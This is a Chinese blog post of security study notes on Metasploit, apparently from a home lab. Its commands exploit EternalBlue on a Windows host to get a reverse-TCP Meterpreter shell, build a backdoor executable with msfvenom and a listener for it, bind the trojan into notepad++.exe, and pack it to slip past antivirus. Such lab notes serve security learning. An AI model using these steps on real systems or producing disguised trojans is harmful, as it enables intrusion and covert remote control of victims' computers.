

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  <link rel="icon" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  
    <meta name="description" content="Metasploit 攻击永恒之蓝全流程一、流程概述利用 Metasploit 框架，通过永恒之蓝（ms17_010_eternalblue ）漏洞对目标 Windows 主机实施攻击，获取 Meterpreter 会话，实现后渗透测试，需合理配置攻击模块参数，涵盖目标与攻击方网络信息、攻击载荷等 。 二、具体步骤（一）选择攻击模块在 Metasploit 中，调用永恒之蓝漏洞对应的攻击模块，命令">
<meta property="og:type" content="article">
<meta property="og:title" content="网安学习笔记——MSF">
<meta property="og:url" content="http://example.com/2025/08/19/%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E2%80%94%E2%80%94MSF/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="Metasploit 攻击永恒之蓝全流程一、流程概述利用 Metasploit 框架，通过永恒之蓝（ms17_010_eternalblue ）漏洞对目标 Windows 主机实施攻击，获取 Meterpreter 会话，实现后渗透测试，需合理配置攻击模块参数，涵盖目标与攻击方网络信息、攻击载荷等 。 二、具体步骤（一）选择攻击模块在 Metasploit 中，调用永恒之蓝漏洞对应的攻击模块，命令">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/68abb87058cb8da5c8493bf5.png">
<meta property="article:published_time" content="2025-08-19T07:59:08.000Z">
<meta property="article:modified_time" content="2025-11-01T05:36:25.217Z">
<meta property="article:author" content="suny">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="Metasploit">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/68abb87058cb8da5c8493bf5.png">
  
  
  
  <title>网安学习笔记——MSF - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://pic.imgdb.cn/item/62c579525be16ec74a579b15.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="网安学习笔记——MSF"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-08-19 15:59" pubdate>
          2025年8月19日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          849 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          8 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">网安学习笔记——MSF</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年11月1日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="Metasploit-攻击永恒之蓝全流程"><a href="#Metasploit-攻击永恒之蓝全流程" class="headerlink" title="Metasploit 攻击永恒之蓝全流程"></a>Metasploit 攻击永恒之蓝全流程</h1><h2 id="一、流程概述"><a href="#一、流程概述" class="headerlink" title="一、流程概述"></a>一、流程概述</h2><p>利用 Metasploit 框架，通过永恒之蓝（<code>ms17_010_eternalblue</code> ）漏洞对目标 Windows 主机实施攻击，获取 Meterpreter 会话，实现后渗透测试，需合理配置攻击模块参数，涵盖目标与攻击方网络信息、攻击载荷等 。</p>
<h2 id="二、具体步骤"><a href="#二、具体步骤" class="headerlink" title="二、具体步骤"></a>二、具体步骤</h2><h3 id="（一）选择攻击模块"><a href="#（一）选择攻击模块" class="headerlink" title="（一）选择攻击模块"></a>（一）选择攻击模块</h3><p>在 Metasploit 中，调用永恒之蓝漏洞对应的攻击模块，命令如下：  </p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript"><span class="hljs-keyword">use</span> exploit/windows/smb/ms17_010_eternalblue<br></code></pre></td></tr></table></figure>
<p>该模块针对 Windows SMB 服务，利用永恒之蓝漏洞发起攻击 。  </p>
<h3 id="（二）查看并配置必选项"><a href="#（二）查看并配置必选项" class="headerlink" title="（二）查看并配置必选项"></a>（二）查看并配置必选项</h3><ol>
<li><p><strong>查看必选参数</strong><br> 输入 <code>show options</code> 命令，筛选 <code>required</code> 为 <code>yes</code> 的配置项，明确需手动设置的参数，确保攻击流程完整 。  </p>
</li>
<li><p><strong>设置目标主机（RHOSTS）</strong><br> 命令：<code>set RHOSTS 192.168.1.128</code><br> 说明：<code>RHOSTS</code> 定义攻击目标，填写目标 Windows 主机的 IP 地址，指定要渗透的对象 。  </p>
</li>
<li><p><strong>设置攻击载荷（Payload）</strong><br> 命令：<code>set payload windows/x64/meterpreter/reverse_tcp</code><br> 说明：<code>payload</code> 决定攻击成功后的行为，选择此载荷可获取 <code>meterpreter</code> 交互环境，它是 Metasploit 后渗透阶段的核心工具，支持文件操作、权限提升等多种渗透动作 。</p>
</li>
</ol>
<p>  <img src="https://pic1.imgdb.cn/item/68a48e8058cb8da5c83a622c.png" srcset="/img/loading.gif" lazyload></p>
<ol start="4">
<li><strong>设置攻击方监听信息</strong>  <ul>
<li><strong>配置监听主机（LHOST）</strong><br> 命令：<code>set LHOST 192.168.1.136</code><br> 说明：<code>LHOST</code> 为攻击方（Kali 系统）的 IP 地址，用于接收目标主机回连的网络标识 。  </li>
<li><strong>配置监听端口（LPORT）</strong><br> 命令：<code>set LPORT 12345</code><br> 说明：<code>LPORT</code> 是攻击方在 Kali 上开启的监听端口（范围 1 - 65535 ，需未被系统占用 ），目标主机通过该端口与攻击方建立连接 。</li>
</ul>
</li>
</ol>
<h1 id="使用Kali生成远控木马及免杀"><a href="#使用Kali生成远控木马及免杀" class="headerlink" title="使用Kali生成远控木马及免杀"></a>使用Kali生成远控木马及免杀</h1><h2 id="一、生成远控木马流程"><a href="#一、生成远控木马流程" class="headerlink" title="一、生成远控木马流程"></a>一、生成远控木马流程</h2><h3 id="（一）利用msfvenom生成后门程序"><a href="#（一）利用msfvenom生成后门程序" class="headerlink" title="（一）利用msfvenom生成后门程序"></a>（一）利用msfvenom生成后门程序</h3><p><code>msfvenom</code> 用于生成后门，在目标机执行后，本地监听可实现远控 ，在shell环境使用，而非<code>msfconsole</code>终端。<br>命令格式（Windows可执行程序后门）：  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p [payload] lhost=[本地IP] lport=[本地端口] -f [输出格式] -o [输出文件名]<br></code></pre></td></tr></table></figure>
<p>示例：  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe<br></code></pre></td></tr></table></figure>
<p>参数解析：  </p>
<ul>
<li><code>payload</code> ：如<code>windows/x64/meterpreter/reverse_tcp</code> ，指定系统、架构、作用方式  </li>
<li><code>lhost</code> ：本地监听IP，即攻击者机器IP  </li>
<li><code>lport</code> ：本地监听端口，自定义设置  </li>
<li><code>f</code> ：输出文件格式，<code>exe</code> 对应Windows可执行文件  </li>
<li><code>o</code> ：设置输出文件名</li>
</ul>
<p><img src="https://pic1.imgdb.cn/item/68a8074e58cb8da5c8425e3c.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="（二）开启监听等待上线"><a href="#（二）开启监听等待上线" class="headerlink" title="（二）开启监听等待上线"></a>（二）开启监听等待上线</h3><p>在<code>msfconsole</code>中操作，用于监听目标机连接：  </p>
<ol>
<li>选择模块：<code>use exploit/multi/handler</code>  </li>
<li>设置payload：<code>set payload windows/x64/meterpreter/reverse_tcp</code>  </li>
<li>配置本地IP：<code>set lhost 192.168.123.136</code>（与生成木马时一致 ）  </li>
<li>配置监听端口：<code>set lport 9999</code>（与生成木马时一致 ）  </li>
<li>启动监听：<code>run</code></li>
</ol>
<p><img src="https://pic1.imgdb.cn/item/68a807c158cb8da5c8425e70.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="二、免杀处理（躲避杀毒软件查杀）"><a href="#二、免杀处理（躲避杀毒软件查杀）" class="headerlink" title="二、免杀处理（躲避杀毒软件查杀）"></a>二、免杀处理（躲避杀毒软件查杀）</h2><h3 id="（一）捆绑木马"><a href="#（一）捆绑木马" class="headerlink" title="（一）捆绑木马"></a>（一）捆绑木马</h3><p>将木马与正常程序捆绑，伪装降低查杀概率。<br>命令格式：  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[本地IP] lport=[本地端口] -f exe -x [正常程序路径] -o [输出文件名]<br></code></pre></td></tr></table></figure>
<p>示例：  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.136 lport=9999 -f exe -x notepad++.exe -o notepad++.exe<br></code></pre></td></tr></table></figure>
<p><code>-x</code> 参数用于指定捆绑的正常程序（如系统常见的<code>notepad++.exe</code> ）  </p>
<h3 id="（二）加壳免杀"><a href="#（二）加壳免杀" class="headerlink" title="（二）加壳免杀"></a>（二）加壳免杀</h3><p>通过加压缩壳、加密壳等方式修改程序特征，躲避查杀。不同杀毒软件检测逻辑不同，需自行测试效果，如部分加壳后可通过“火绒安全”病毒查杀（显示“本次扫描未发现风险” ） ，常见加壳工具可辅助实现压缩壳、加密壳添加操作。 </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%BD%91%E5%AE%89/" class="category-chain-item">网安</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F/" class="print-no-link">#渗透</a>
      
        <a href="/tags/Metasploit/" class="print-no-link">#Metasploit</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>网安学习笔记——MSF</div>
      <div>http://example.com/2025/08/19/网安学习笔记——MSF/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年8月19日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/11/01/%E5%B8%B8%E7%94%A8%E8%B5%84%E6%BA%90%E6%B1%87%E6%80%BB/" title="常用资源汇总">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">常用资源汇总</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/08/19/MSF%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7%E6%8C%87%E5%8D%97/" title="Metasploit Framework (MSF) 渗透测试工具指南">
                        <span class="hidden-mobile">Metasploit Framework (MSF) 渗透测试工具指南</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <br> <a target="_blank" rel="nofollow noopener"><span>待到山花烂漫时，她在丛中笑。</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
